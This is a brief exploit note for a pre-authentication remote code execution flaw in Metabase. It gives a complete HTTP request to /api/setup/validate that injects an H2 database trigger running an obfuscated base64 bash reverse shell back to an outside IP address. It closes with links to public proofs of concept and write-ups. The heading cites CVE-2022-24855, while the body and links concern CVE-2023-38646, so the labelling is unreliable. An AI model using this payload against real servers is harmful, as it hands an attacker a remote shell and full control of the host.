CVE-2022-24855

Metabase - Remote Code Execution

Metabase - Remote Code Execution / Pre-Auth

Vulnerability: /api/session/properties leaks setup-id token that can be validated sending a post request to /api/setup/validate

POST /api/setup/validate HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 812

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/birds_of_the_world-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjE0LzQzMyAwPiYxCg==|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

POC:

GitHub - securezeron/CVE-2023-38646: POC for CVE-2023-38646GitHub

GitHub - kh4sh3i/CVE-2023-38646: Metabase Pre-auth RCE (CVE-2023-38646)GitHub

Resources:

Security incident post-mortem: July 2023Metabase | Business Intelligence, Dashboards, and Data Visualization

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)Assetnote

NVD - cve-2022-24855